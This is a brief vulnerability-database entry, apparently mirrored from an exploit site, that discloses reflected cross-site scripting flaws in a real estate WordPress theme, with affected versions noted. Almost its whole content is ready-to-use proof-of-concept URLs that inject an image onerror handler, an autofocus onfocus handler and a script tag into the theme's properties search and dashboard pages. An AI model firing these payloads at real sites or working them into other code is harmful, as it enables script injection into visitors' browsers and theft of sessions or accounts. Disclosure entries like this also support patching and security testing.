Share
## https://sploitus.com/exploit?id=WPEX-ID:10336
Unauthenticated Reflected XSS:
http://reality.inwavethemes.com/properties/?status=&keyword=1%22--%3E&label=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(`XSS`)%3E (v < 2.5.5)
http://reality.inwavethemes.com/properties/?status=&keyword=1A%22%20autofocus=autofocus%20onfocus=alert(`XSS`);// (v < 2.5.6)

Authenticated Reflected XSS: http://reality.inwavethemes.com/dashboard/?tab=%22%3E%3Cscript%3Ealert(`XSS`);%3C/script%3E